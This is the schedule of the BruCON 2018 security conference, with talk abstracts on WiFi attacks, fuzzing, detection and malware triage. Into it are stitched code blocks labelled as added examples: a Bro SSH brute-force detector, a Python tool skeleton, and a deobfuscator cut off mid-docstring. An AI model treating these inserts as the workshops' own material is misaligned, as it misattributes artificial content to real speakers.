BruCON 0x0A has ended


Wednesday, October 3
 

08:30

Registration & Breakfast
Wednesday October 3, 2018 08:30 - 10:00
00. Lounge University

10:00

BruCON Retro Opening
The original BruCON founders and the current crew will reminisce over the BruCON history!

Speakers:
Founders:
Philippe Bogaerts, Pieter Danhieux, Seba Deleersnyder, Benny Ketelslegers and Filip Waeytens

Current crew:
Philippe Bogaerts, Koen Burms, Stephen Corbiaux, Matt Erasmus, Tom Gilis, Xavier Mertens, Jochen Raymaekers, Pieter Van Goethem, Larry Vandenaweele, Stephanie Vanroelen, Bertrand Varlet and Marijke Vinck.

Wednesday October 3, 2018 10:00 - 10:30
01. Westvleteren University

10:30

Advanced WiFi Attacks using Commodity Hardware
This talk explains how low-layer attacks against WiFi can be implemented by modifying the firmware of off-the-shelf WiFi dongles. Additionally, in this new version of the talk, we also discuss how mobile phones can be modified to carry out similar attacks.

First, we show how to give ourselves a higher throughput than normally allowed. Then we create a continuous jammer which makes the channel completely unusable for all devices. Based on this we also show how to implement a selective jammer, allowing one to jam only packets of specific clients. It’s surprising all this is possible using cheap hardware, in particular the selective jammer, since it must adhere to very strict timing constraints to timely jam the targeted frames.

Finally, we demonstrate how our low-layer attacks facilitate attacks against higher-layer protocols. In particular we use our modified firmware to implement a multi-channel man-in-the-middle attack. This can then be used to attack WPA-TKIP. In this new version of the talk we also discuss how this MitM position was used in the KRACK attacks against WPA2, and several other attacks against protected Wi-Fi networks.

Speakers

Mathy Vanhoef

Mathy Vanhoef is a postdoctoral researcher at KU Leuven. He is most well known for his KRACK attack against WPA2, and the RC4 NOMORE attack against RC4. His research interest is in computer security with a focus on wireless security (e.g. Wi-Fi), network protocols, applied cryptography...


Wednesday October 3, 2018 10:30 - 11:30
01. Westvleteren University

11:30

Hacking driverless vehicles
Are driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. Pioneering tests of autonomous vehicles were performed in Europe and all trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems.

This session will be an informative and amusing look at the current state of civil driverless vehicles and what hackers or other miscreants might do to mess with them. Topics covered will include common sensors, decision profiles and their potential failure modes that could be exploited. With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. The talk will also contain brand new information from conversations with the US Department of Transportation including insights into the new Connected Vehicle and Vehicle To Vehicle Communications programs that may be hacking-relevant well before the adoption of fully autonomous cars and other vehicles.

Speakers

ZoZ

Zoz is a robotics interface designer and rapid prototyping specialist. He is a co-founder of Cannytrophic Design in Boston and CTO of BlueSky in San Francisco. As co-host of the Discovery Channel show 'Prototype This!' he pioneered urban pizza delivery with robotic vehicles, including...


Wednesday October 3, 2018 11:30 - 12:30
01. Westvleteren University

12:30

Lunch
Wednesday October 3, 2018 12:30 - 13:30
00. Lounge University

13:30

(Re)Investigating PowerShell attacks
At BruCON 2014, we presented “Investigating PowerShell Attacks” at what ended up being the precipice of widespread adoption and abuse of PowerShell in the wild. A year later, we examined how PowerShell Desired State Configuration (DSC) provided further avenues for covert persistence and C2. In this presentation, we’ll look at how these offensive techniques - and the corresponding approaches to detection and response - have evolved.


Wednesday October 3, 2018 13:30 - 14:30
01. Westvleteren University

14:30

Levelling Up Security @ Riot Games
In this talk, Mark will be discussing his 5+ years at Riot Games where the InfoSec team has developed a security program (https://engineering.riotgames.com/news/evolution-security-riot) based on feedback and self-service, across a truly hybrid infrastructure.

Starting with a recap of his 2015 BruCON talk (Feedback Security), Mark will dive into where the team failed and succeeded in the years since the talk. He will dive into areas such as:

- internal RFCs
- developer education & collaboration on solutions
- receiving feedback when the team don't hit the bar and acting on it
- in-house tools designed and developed to provide visibility into the security posture of AWS
- open-sourcing tools and contributing to other open-source projects 

An attendee should:

- see some pretty cool art (not created by Mark, obviously)
- understand where the Riot InfoSec team failed and succeeded
- learn about a self-service, feedback-driven approach to security, where the InfoSec team is embraced, not hated

Disclaimer :: There will be no cool exploits, 0days or buffer overloads in this talk.

Speakers

Mark Hillick

Mark leads Player Security at Riot Games, makers of League of Legends. Prior to moving to the US, Mark built and led Riot’s InfoSec team in Europe. At Riot, he has done everything from building teams, occasional engineering, levelling up the security program, dealing with DDoS attacks...


Wednesday October 3, 2018 14:30 - 15:30
01. Westvleteren University

15:30

Coffee Break
Wednesday October 3, 2018 15:30 - 16:00
00. Lounge University

16:00

Social engineering for penetration testers
2009 talk overview:
In recent years, people have become more familiar with the term "social engineering", the use of deception or impersonation to gain unauthorised access to resources from computer networks to buildings. Does this mean that there are fewer successful social engineering attacks? Probably not.
In fact, because computer security is becoming more sophisticated and more difficult to break (although this is still very possible) more and more people are resorting to social engineering techniques as a means of gaining access to an organisation's resources. Logical security is at a much greater risk of being compromised if physical security is weak and security awareness is low. Performing a social engineering test on an organisation gives a good indication of the effectiveness of current physical security controls and the staff's level of security awareness. But once you have decided to perform a social engineering test, where do you start? How do you actually conduct a social engineering test?

2018 talk overview:
It’s 2018 and we can’t get enough social engineering. People are still falling for social engineering scams and criminals are using more social engineering techniques than ever. On the plus side, social engineering testers are busier than ever too. So how do you actually conduct a social engineering test in 2018? Has much changed over the past decade? Thanks to recycling, dumpster diving is a lot less disgusting, that’s for sure. Come and hear what else has changed from someone who has been delivering social engineering tests since before BruCON existed.

Speakers

Sharon Conheady

Sharon Conheady is the director of First Defence Information Security (www.firstdefenceis.com) and a founding member of The Risk Avengers (www.riskavengers.co.uk). She specialises in the human side of security and has social engineered her way into dozens of organisations across the UK and abroad, including company offices, sports stadiums, government facilities and more. Sharon is a regular speaker at security events and has appeared as...


Wednesday October 3, 2018 16:00 - 17:00
01. Westvleteren University

17:00

The 99c heart surgeon dilemma
Let's assume you need heart surgery. I hope you don't, but let's just stick with it for a minute. How much would you be willing to pay for someone to fix it and who would you hire to do it? If you are a suicidal emo kid, please do not answer, you are ruining the point here. Here's the thing: people want someone suitable and knowledgeable to cut them open and sew them up again and they are willing to pay good money for it. Here are two things you don't want to do:

1) You don't want to hire some old drunk with a pocket knife and a sewing kit from the dollar shop who claims to fix your heart for 100 bucks.

2) You don't want to hire the same guy for 100'000 bucks when he's wearing a white coat and got shiny high tech tools because the last guy paid in advance...

What does this have to do with penetration testing? More than we like, unfortunately. I have met companies that invested thousands of dollars, expecting a pentest and getting a spiced up Nessus report as a result. More subtle nuances of "crappy pentest" might overlook essential threats and leave customers at risk with a false sense of security.

This talk will explore the common mistakes made when performing pentests, which include the test itself as well as pre- and post-engagement matters. It applies to testers and customers alike. Also, it might help save the rainforests.

While revisiting this talk from 2011, we will look into the question: Have things changed for the better and do we still face the same issues?

Speakers

Stefan Friedli

Stefan Friedli has been working in infosec since 2003 after wasting his teenage years on assembler and shareware nag screens. He is a well-known face in the European Infosec Community. As a speaker at various conferences, co-founder of the Penetration Testing Execution Standard as...


Wednesday October 3, 2018 17:00 - 18:00
01. Westvleteren University

18:30

Nerdland podcast recording
For our tenth anniversary we have arranged a special event to supplement our standard conference track. On October 3rd, from 7:00 PM – 8:00 PM, one of Belgium’s most popular podcasts will be recorded in the main auditorium “Westvleteren” at the BruCON venue. As of 6:30 PM, there will be free entrance so anybody can join!

Lieven Scheire’s Nerdland podcast brings together a bunch of nerdy science freaks to share the most important science news of the past month. Interesting science facts put forward in a hilarious manner. With cyber security as a recurring topic on the show, we are sure you will like it just as much as the BruCON Crew does.

After the usual conference track the bar will remain open, and a sandwich dinner will be provided at the venue for anyone who wishes to sit in the live audience.


Language spoken: English
More info: https://soundcloud.com/lieven-scheire
Twitter: @lievenscheire

Wednesday October 3, 2018 18:30 - 20:00
01. Westvleteren University

19:00

Mentor/Mentee
With this initiative we want to provide a stepping stone for people who are new to the infosec community or are just in need of finding a mentor or providing guidance.
During this event you can choose to be a Mentor or a Mentee, or even both.
Mentors are typically seasoned professionals, having done quite some miles on the professional infosec road, who are willing to provide advice to the Mentees.
This advice can vary from Mentee to Mentee, but could include: which training should I follow, what are key messages you can give based on personal experience, how do I get to know new people, whom to follow on Twitter, general advice to survive in this industry, help with presentations and much more. Mentees can be people who are fairly new to the security scene, or who are willing to receive advice from more seasoned professionals.
We all started at some point in time within this industry, and we have all had our challenges. With this programme we want to close this gap and create a stronger bond between seasoned professionals and people new to the industry.

The Mentor/Mentee programme is an initiative that can vary in duration. For some this might be a one-off event, but for others this might create a bond with a mentor that will last.
Please join us from 19:00 (7 PM) until 21:00 (9 PM) at the Novotel Bar.
Be sure to use the mentor / mentee stickers to indicate the role you want to play.

Wednesday October 3, 2018 19:00 - 22:00
Novotel Novotel Ghent
 
Thursday, October 4
 

08:30

Registration & Breakfast
Thursday October 4, 2018 08:30 - 10:00
00. Lounge University

09:45

BruCON Opening
Thursday October 4, 2018 09:45 - 10:00
01. Westvleteren University

10:00

Keynote - When Lemon Markets, Imposter Syndrome & Dunning–Kruger collide
A talk on why we struggle to secure organizations, or build useful security products (and how we can do better).

Speakers

Haroon Meer

Haroon Meer is the founder of Thinkst, the company behind the well loved Thinkst Canary. Haroon has contributed to several books on information security and has published a number of papers and tools on various topics related to the field. Over the past decade (and a half) he has...


Thursday October 4, 2018 10:00 - 11:00
01. Westvleteren University

10:00

ICS and IoT Village
Thursday October 4, 2018 10:00 - 19:00
02. Westmalle University

10:30

Introduction to Bro Network Security Monitor

Bro is an open-source Network Security Monitor (NSM) and analytics platform. Even though it has been around since the mid-90s, its main user base was primarily universities, research labs and supercomputing centers. In the past few years, however, more and more security professionals in the industry have turned their attention to this powerful tool, as it runs on commodity hardware, thus providing a low-cost alternative to commercial solutions.

At its core, Bro inspects traffic and creates an extensive set of well-structured, tab-separated log files that record a network’s activity. Nonetheless, Bro is a lot more than just a traditional signature-based IDS. While it supports such standard functionality as well, Bro’s scripting language allows security analysts to perform arbitrary analysis tasks such as extracting files from sessions, detecting malware by interfacing with an external source, detecting brute-forcing, etc. It comes with a large set of pre-built standard libraries, just like Python. 

During this two-hour workshop, we will learn about Bro's capabilities and cover the following topics: 
- Introduction to Bro 
- Bro architecture 
- Bro events and logs 
- Bro signatures 
- Bro scripting 
- Bro and ELK 
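As an added example, and not part of the workshop material or of the Bro project itself, the following Python parses the tab-separated log format the description above refers to. It reads the header lines Bro writes at the top of every log (#separator, #fields, #types, #unset_field, #empty_field), types each column accordingly, and then runs one of the analyses the description mentions, detecting SSH brute forcing, over a constructed ssh.log excerpt. The field names follow Bro's ssh.log; the values, hosts and uids are invented for the example.

```python
"""Parse Bro/Zeek tab-separated logs and flag SSH brute forcing.

Added example for this page, not code from the workshop or from the Bro
project. SAMPLE_SSH_LOG is a constructed ssh.log excerpt: field names follow
Bro's ssh.log, the values are invented.
"""
from collections import defaultdict

SAMPLE_SSH_LOG = "\n".join([
    "#separator \\x09",                      # literal text as Bro writes it
    "#set_separator\t,",
    "#empty_field\t(empty)",
    "#unset_field\t-",
    "#path\tssh",
    "#open\t2018-10-04-10-30-00",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tversion"
    "\tauth_success\tauth_attempts\tclient\tserver",
    "#types\ttime\tstring\taddr\tport\taddr\tport\tcount\tbool\tcount\tstring\tstring",
    "1538641800.101\tCkA1\t10.0.0.5\t51000\t10.0.0.22\t22\t2\tF\t3\tSSH-2.0-libssh\tSSH-2.0-OpenSSH_7.4",
    "1538641803.204\tCkA2\t10.0.0.5\t51001\t10.0.0.22\t22\t2\tF\t3\tSSH-2.0-libssh\tSSH-2.0-OpenSSH_7.4",
    "1538641806.330\tCkA3\t10.0.0.5\t51002\t10.0.0.22\t22\t2\tF\t2\tSSH-2.0-libssh\tSSH-2.0-OpenSSH_7.4",
    "1538641810.000\tCkA4\t10.0.0.9\t40123\t10.0.0.22\t22\t2\tT\t1\tSSH-2.0-OpenSSH_7.6\tSSH-2.0-OpenSSH_7.4",
    "1538641812.500\tCkA5\t10.0.0.7\t40999\t10.0.0.22\t22\t2\t-\t-\t(empty)\tSSH-2.0-OpenSSH_7.4",
    "#close\t2018-10-04-10-35-00",
])


def _convert(value, type_name, unset, empty):
    """Map one Bro field to a Python value using the #types declaration."""
    if value == unset:
        return None
    if value == empty:
        return ""
    if type_name in ("count", "int", "port"):
        return int(value)
    if type_name in ("time", "interval", "double"):
        return float(value)
    if type_name == "bool":
        return value == "T"
    return value  # addr, string, enum: keep as text


def parse_bro_log(text):
    """Return one dict per data row, typed according to the #types header."""
    sep, unset, empty = "\t", "-", "(empty)"
    fields, types, records = [], [], []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#separator"):
            # "#separator \x09": decode the escape sequence into the real character
            sep = line.split(" ", 1)[1].encode("ascii").decode("unicode_escape")
            continue
        if line.startswith("#"):
            key, *vals = line[1:].split(sep)
            if key == "fields":
                fields = vals
            elif key == "types":
                types = vals
            elif key == "unset_field":
                unset = vals[0]
            elif key == "empty_field":
                empty = vals[0]
            continue  # #path, #open, #close, #set_separator are not needed here
        cols = line.split(sep)
        if len(cols) != len(fields):
            raise ValueError("column count does not match #fields: %r" % line)
        records.append({f: _convert(v, t, unset, empty)
                        for f, t, v in zip(fields, types, cols)})
    return records


def detect_ssh_bruteforce(records, threshold=5):
    """Sum failed authentication attempts per source; return sources at or over threshold."""
    failed = defaultdict(int)
    for r in records:
        # auth_success None means Bro could not tell; skip those connections
        if r.get("auth_success") is False and r.get("auth_attempts") is not None:
            failed[r["id.orig_h"]] += r["auth_attempts"]
    return {src: n for src, n in failed.items() if n >= threshold}


if __name__ == "__main__":
    recs = parse_bro_log(SAMPLE_SSH_LOG)
    for src, n in detect_ssh_bruteforce(recs).items():
        print("possible SSH brute force from %s: %d failed attempts" % (src, n))
```

The same parser works for conn.log, http.log or any other Bro log, because the column names and types come from the header rather than being hard-coded; only the analysis function is specific to ssh.log.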

Speakers

Eva Szilagyi

CEO, Alzette Information Security
Eva Szilagyi is managing partner and CEO of Alzette Information Security, a consulting company based in Luxembourg. She has more than 8 years of professional experience in penetration testing, security source code review, digital forensics, IT auditing, telecommunication networks...

David Szili

CTO, Alzette Information Security
David Szili is managing partner and CTO of Alzette Information Security, a consulting company based in Luxembourg. He has more than 8 years of professional experience in penetration testing, red teaming, vulnerability assessment, vulnerability management, security monitoring, security...


Thursday October 4, 2018 10:30 - 12:30
03. Chimay Novotel

10:30

Python Toolsmithing 101

In this 2 hour workshop, the attendees will learn how to create (security) tools in Python. With more than 30 years experience in the development of tools, 12 years of publication, more than 100 tools and at least a couple of tools widely used by the security community, Didier Stevens will share his knowledge in this workshop and teach attendees how to develop their own tools in Python.

To get a major boost when attendees start developing their first tool, Didier will share his private templates for the development of tools and explain all the features and how to develop with these templates. These private templates will become public after this workshop.

These templates are actually used by Didier to develop and publish new tools.

One template is for binary files. This template can not only read and process binary files, but also binary files stored in compressed files, binary files provided via stdin, generated files, here-documents, … Output can be generated in different formats: binary, hexadecimal, ASCII/Hexadecimal, custom, …

Another template is for text files. Like the binary file template, this template too has several input methods and output methods.

Attendees will learn about features that are common across Didier Stevens’ tools, and that they can use in their own tools developed with the templates.

After completing several exercises to get familiar with Python toolsmithing and Didier’s templates, 2 new tools (one binary tool and one text tool) will be developed by the attendees under Didier’s guidance.

After the workshop, attendees will have enough knowledge to get started as a Python toolsmith. Depending on the complexity of the tools they want to create, a new tool can be as simple as programming one new Python function, thanks to the features provided by the template.
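As an added example, and not Didier Stevens' own templates, here is a minimal Python skeleton of the kind the description above talks about: one tool that accepts its input as a regular file, as stdin ('-'), as the first member of a .zip archive, or as an inline literal (the #h#<hex> and #b64#<base64> prefixes are a convention assumed for this example only), and renders the bytes as raw, hex, or a hexdump with an ASCII column. Adding a new analysis means adding one function that takes the loaded bytes.

```python
"""Skeleton for a binary-file analysis tool with several input and output methods.

Added example for this page; a minimal skeleton written for illustration, not
Didier Stevens' templates. The #h#/#b64# inline-literal prefixes are a
convention assumed here.
"""
import argparse
import base64
import binascii
import sys
import zipfile


def load_input(source):
    """Return the bytes named by `source`: file path, '-', .zip archive, #h#, #b64#."""
    if source == "-":
        return sys.stdin.buffer.read()
    if source.startswith("#h#"):
        return binascii.unhexlify(source[3:])
    if source.startswith("#b64#"):
        return base64.b64decode(source[5:], validate=True)
    if zipfile.is_zipfile(source):
        with zipfile.ZipFile(source) as zf:
            names = zf.namelist()
            if not names:
                raise ValueError("empty zip archive: %s" % source)
            return zf.read(names[0])  # first member only, for brevity
    with open(source, "rb") as f:
        return f.read()


def hexdump(data, width=16):
    """Classic offset / hex / ASCII dump, one line per `width` bytes."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join("%02x" % b for b in chunk).ljust(width * 3 - 1)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append("%08x  %s  %s" % (off, hexpart, asc))
    return "\n".join(lines)


def render(data, fmt):
    """Format bytes as requested: raw (bytes), hex (str) or dump (str)."""
    if fmt == "raw":
        return data
    if fmt == "hex":
        return binascii.hexlify(data).decode("ascii")
    if fmt == "dump":
        return hexdump(data)
    raise ValueError("unknown output format: %s" % fmt)


def main(argv=None):
    parser = argparse.ArgumentParser(description="binary tool skeleton")
    parser.add_argument("source", help="file, '-', .zip, #h#<hex> or #b64#<base64>")
    parser.add_argument("-o", "--output", choices=("raw", "hex", "dump"), default="dump")
    args = parser.parse_args(argv)
    out = render(load_input(args.source), args.output)
    if isinstance(out, bytes):
        sys.stdout.buffer.write(out)  # raw output must bypass text encoding
    else:
        print(out)


if __name__ == "__main__":
    main()
```

Usage: `python tool.py sample.bin`, `cat sample.bin | python tool.py -`, `python tool.py '#h#4d5a9000' -o dump`. Keeping input acquisition and output rendering in two functions is what lets each new tool be "one new function" between them.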

Speakers

Didier Stevens

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You...


Thursday October 4, 2018 10:30 - 12:30
04. Orval Novotel

10:30

Simplifying the art of instrumentation

1. Source instrumentation & Binary instrumentation

2. Static
    a. Compile time instrumentation
        i. LLVM
        ii. AFL instrumentation use case
    b. Binary rewriting

3. Dynamic instrumentation
    a. Introduction
    b. PIN
    c. Dynamo Rio
    d. DynInst

4. Application of instrumentation in the domain of security:
    a. Coverage tracing
    b. Aiding reverse engineering
    c. Vulnerability discovery
    d. Malware analysis
    e. Taint analysis
    f. Debugging
    g. Data flow analysis
    h. Control flow analysis

Speakers

Rushikesh D. Nandedkar

Rushikesh is a security analyst. Having more than six years of experience under his belt, his assignments have always been aimed at reducing the state of insecurity for information. His research papers were accepted at NCACNS 2013, nullcon 2014, HITCON 2014, Defcamp 2014, BruCON...

Krishnakant B. Patil

Krishnakant is a vulnerability researcher by profession. Yet, he is best known amongst security researchers for his cutting edge capabilities and skills in reverse engineering, exploit development and malware analysis. He has successfully conducted many workshops and hands on...


Thursday October 4, 2018 10:30 - 12:30
05. La Trappe Novotel

10:30

The hunt is on: Engineering the NextGen Cyber Threat Detection System. Attackers, it’s not so easy to hide anymore! (Short Version)

The cyber attack landscape has changed. Malicious adversaries continue to enhance the techniques used to exploit enterprise networks. A key ingredient missing for our cyber experts is a better way to hunt for adversarial presence. The purpose of this talk is to show how to engineer a brand new Cyber Threat Intelligence Detection System (CTDS) and release two new frameworks, Excalibur TIE Mark I and Themis Network Analyzer, that give investigators a better way to hunt for new threats in real time. This technical talk dives straight in to show how to engineer the intelligence engine and create autonomous network sensors that extract and analyze thousands of artifacts both from each host machine and directly from the enterprise network. This system develops real indicators of compromise (IOCs) from large data sets and then applies these IOCs to better protect your enterprise network from new attacks.

Novel approaches are presented with algorithms used to analyze, correlate, and produce IOCs allowing the investigator to better hunt for new threats, populate uniform data sets best for information dissemination and analysis, and create new visualization graphs used for the human to derive meaning from vast amounts of data aggregation.  Finally, this talk applies everything we’ve learned and shows how to create new distributed network sensors and deploy IOCs discovered from the Threat Intelligence Engine to better protect the enterprise network.  Rest assured, lots of live demos are included in this talk.  And of course, this talk comes with a new open-source tool release for the community to use!

Attacks of tomorrow will no longer be as effective if we have the right tools to better hunt for the adversary.  This involves a new set of thinking.  Threat Intelligence will be the next paradigm in computer security.  Allow me to show you how to engineer the entire framework and deploy it on your network.

Speakers

Solomon Sonya

Solomon Sonya (@Carpenter1010) is an Assistant Professor of Computer Science at the United States Air Force Academy. He has a background in software development, malware analysis, covert channels, steganography, distributed computing, computer hacking, information protection paradigms...


Thursday October 4, 2018 10:30 - 12:30
06. Rochefort Novotel

11:00

Reversing Industrial Protocols – Real World Use Cases (From zero to control in 10 minutes)
XiaK (http://security.xiak.be/en), the Center of Expertise for Industrial Automation in Kortrijk, Belgium, is a research group of Ghent University.
Recently (3 years ago), a new project was started on industrial security. Its main topic: create awareness for implementing in-depth network segmentation and security by demonstrating old and new vulnerabilities in commonly used industrial devices.

These include the known problems with Siemens PLCs or common switches, and demonstrating sniffing, MitM etc.
But foremost, since the target audience is Belgium and the SMEs therein, the most used industrial hardware for this region is actually a trilogy of Siemens, Beckhoff and Phoenix Contact. All three are major and large OEMs that (should) have security as one of their concerns...

Speakers

Tijl Deneut

Tijl Deneut has over 5 years of experience in the IT security sector and is, amongst others, an Ethical Hacker and an active EC-Council Certified Instructor. Tijl also teaches at the Howest University College and the Ghent University, where he also leads several research projects. He has had the privilege...


Thursday October 4, 2018 11:00 - 11:30
02. Westmalle University

11:00

Finding 0days in embedded systems with code coverage guided fuzzing
Coverage-guided fuzzing has become a trending technique to discover vulnerabilities in powerful systems such as PCs, and is a main contributor to countless 0days in the last few years.

Unfortunately, this breakthrough methodology is not yet applied to find bugs in embedded devices (like network routers, IP cameras, etc). We found some of the reasons as follows: 

- As closed ecosystems, embedded devices usually come without built-in shell access or development facilities such as compiler & debugger. This makes it impossible to introduce a fuzzer to directly run & find bugs inside them. 

- Even when available for download (rarely), most embedded firmware is not open source, which limits the usage of available guided fuzzers such as AFL & LibFuzzer, as these tools require source code to inject basic block instrumentation at compile time.

- Most existing work focuses on the Intel architecture, while all embedded devices run on other CPUs such as ARM, MIPS or PowerPC. Our study reveals that fuzzing tools on these architectures are sorely lacking.

This research aims to overcome the mentioned issues to build a new guided fuzzer for embedded systems. 

- We emulate the firmware so we can put in our fuzzing & debugging tools. We will first explain how we directly extract firmware from physical devices, then emulate it in a virtual machine with a lot of tricks involving static binary dependency duplication and patching firmware for NVRAM simulation in order to feed actual responses for program configuration.

- We will introduce a new lightweight dynamic binary instrumentation (DBI) framework that supports all platforms & embedded architectures in use today, including Arm, Arm64, Mips, PowerPC & Sparc (plus, we also support Intel X86). The design & implementation of this framework will be presented in detail, so the audience can also see many other applications of our DBI beyond this project.

- We will discuss how we built a powerful guided fuzzer to run inside emulated firmware. Using our own DBI at the heart for basic block instrumentation, this requires no firmware source code, and can find vulnerabilities in binary-only applications on all kinds of embedded CPUs available.

In a limited time of just a few months, our fuzzer discovered many 0days in some widely popular embedded network devices. Among them, several vulnerabilities allow pre-authenticated remote code execution that affects millions of users, and can potentially be turned into a new botnet worm with massive-scale infection. These bugs will be released to the public in our talk if the vendors fix them in time.

The audience can expect a deeply technical, but still entertaining presentation, with many exciting demos.

Speakers

Quynh Nguyen Anh

Dr. Nguyen Anh Quynh is a regular speaker at industrial information security conferences such as Blackhat USA/Europe/Asia, DEFCON, RECON, Syscan, HackInTheBox, Shakacon, Opcde, ZeroNights, Hack.lu, Deepsec, XCon, Confidence, Hitcon, Eusecwest, etc. He also presented his research...

Lau Kai Jern

KaiJern, Lau (xwings) is the IoT/Blockchain researcher at JD Security (JD.COM), Advisor for UnicornTeam/HACKNOWN Team and also Hack In The Box Security Conference core crew. His research focuses mainly on the hardware and software of embedded devices, blockchain security, reverse engineering...


Thursday October 4, 2018 11:00 - 12:00
01. Westvleteren University

12:00

$SignaturesAreDead = “Long Live RESILIENT Signatures” wide ascii nocase
Signatures are dead, or so we're told. It's true that many items that are shared as Indicators of Compromise (file names/paths/sizes/hashes and network IPs/domains) are no longer effective. These rigid indicators break at the first attempt at evasion. Creating resilient detections that stand up to evasion attempts by dedicated attackers and researchers is challenging, but is possible with the right tools, visibility and methodical (read iterative) approach. 

As part of FireEye's Advanced Practices Team, we are tasked with creating resilient, high-fidelity detections that run across hundreds of environments and millions of endpoints. In this talk we will share insights on our processes and approaches to detection development, including practical examples derived from real-world attacks.

Speakers

Daniel Bohannon

Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and develop effective detection signatures and processes (among other things). Matthew previously...

Matthew Dunwoody

Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and develop effective detection signatures and processes (among other things). Matthew previously...


Thursday October 4, 2018 12:00 - 13:00
01. Westvleteren University

13:00

Lunch
Thursday October 4, 2018 13:00 - 14:00
00. Lounge University

13:30

Python Toolsmithing 101

In this 2 hour workshop, the attendees will learn how to create (security) tools in Python. With more than 30 years experience in the development of tools, 12 years of publication, more than 100 tools and at least a couple of tools widely used by the security community, Didier Stevens will share his knowledge in this workshop and teach attendees how to develop their own tools in Python.

To get a major boost when attendees start developing their first tool, Didier will share his private templates for the development of tools and explain all the features and how to develop with these templates. These private templates will become public after this workshop.

These templates are actually used by Didier to develop and publish new tools.

One template is for binary files. This template can not only read and process binary files, but also binary files stored in compressed files, binary files provided via stdin, generated files, here-documents, … Output can be generated in different formats: binary, hexadecimal, ASCII/Hexadecimal, custom, …

Another template is for text files. Like the binary file template, this template too has several input methods and output methods.

Attendees will learn about features that are common across Didier Stevens’ tools, and that they can use in their own tools developed with the templates.

After completing several exercises to get familiar with Python toolsmithing and Didier’s templates, 2 new tools (one binary tool and one text tool) will be developed by the attendees under Didier’s guidance.

After the workshop, attendees will have enough knowledge to get started as a Python toolsmith. Depending on the complexity of the tools they want to create, a new tool can be as simple as programming one new Python function, thanks to the features provided by the template.

Speakers

Didier Stevens

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You...


Thursday October 4, 2018 13:30 - 15:30
06. Rochefort Novotel

13:30

Developing Resilient Detections (with Obfuscation & Evasion in Mind)

WARNING: Heavy obfuscation, evasion and general offensive techniques will be demonstrated to challenge and improve attendees’ defensive thinking and detection approaches!

Offensive tradecraft and "living off the land" techniques are discovered, developed and released to the public at breakneck speeds. Attackers begin using these techniques within hours of their release. However, defenders often spend days, weeks or months identifying and reactively creating signatures for these techniques. Often these reactive signatures are overly rigid; therefore, they are easily bypassed by simple modifications to the command or technique.

In this workshop we will:
    * Develop multiple layers of resilient host-based and network-based detections for several relevant "living off the land" attack techniques
    * Introduce incremental layers of obfuscation and evasion techniques to the attacker commands and payloads to iteratively evade and harden our detection approach
    * Learn about numerous host-based artifacts we can use for detection purposes (process arguments, common persistence locations, image load events, prefetch files, Shimcache, Amcache, SRUM - System Resource Usage Monitor, etc.)
    * Implement detection logic in numerous formats including IOCs (Indicators of Compromise), YARA rules, and Snort signatures

The author has several years of real-world experience creating, tuning and enriching real-time detections that run on 10+ million endpoints in hundreds of environments around the world. This firsthand experience will help facilitate conversations around false positives, detection performance and signal-to-noise ratios, concepts that are often overlooked (and sometimes less relevant) when dealing only with smaller environments.

Speakers
Daniel Bohannon
Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and develop effective detection signatures and processes (among other things). Matthew previously...

Thursday October 4, 2018 13:30 - 17:30
03. Chimay Novotel

13:30

Finding security vulnerabilities with modern fuzzing techniques
Fuzzing is a very powerful technique to detect flaws and vulnerabilities in software. The aim of this hands-on workshop is to demonstrate different techniques which can be used to fuzz applications or libraries. Choosing the correct and most effective fuzzing technique will be discussed with real-world examples. Moreover, hints on common problems and pitfalls during fuzzing will be given. After discussing the theory behind modern fuzzing techniques we look at famous fuzzers and how they can be used to find real-world vulnerabilities. In the second part, important areas which influence the fuzzing results are covered. Moreover, we discuss differences between fuzzing open-source and closed-source applications and useful reverse engineering techniques which assist the fuzzing process.

Speakers
Rene Freingruber
Senior Security Consultant, SEC Consult
René Freingruber has been working as a professional security consultant for SEC Consult for several years. He conducts research in the fields of malware analysis, reverse engineering, fuzzing and exploit development. For his bachelor thesis he studied modern mitigation techniques...

Thursday October 4, 2018 13:30 - 17:30
05. La Trappe Novotel

13:30

Malware Triage: Analyzing Malscripts – Return of The Exploits!
In recent years malscripts and file-based exploits have become a main delivery method for malware. Malscripts are often heavily obfuscated and they can take many different forms, including WScript, JavaScript, macros, and PowerShell. There has also been a rise in document-based exploits used to deliver and execute these malscripts. As a result, incident responders and malware analysts need to be comfortable analyzing different document formats, identifying potential exploits, and analyzing malscripts.

In this workshop you will work through the triage of a live malware delivery chain that includes a malicious document, malicious scripts, and a final malware payload. During this process you will be exposed to different document-based exploits, and you will practice the skills required to manually analyze malscripts. This workshop focuses on the fundamental analysis techniques used when identifying, deobfuscating, and analyzing maldocs and malscripts. However, we will also provide an introduction to automation tools and techniques that can be used to speed up the analysis process.
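
The following is an added example, not the workshop's material or Open Analysis code: a small pass-based deobfuscator for the layering a VBScript malscript typically uses, namely `Chr()` character building, `StrReverse()`, `Replace()` with constant arguments, `&` concatenation, and variables that end up holding constants. The sample script is constructed for the example and is inert; the set of passes is an assumption, and a real sample will usually need more.

```python
"""Pass-based deobfuscation of a VBScript-style malscript (added example, not
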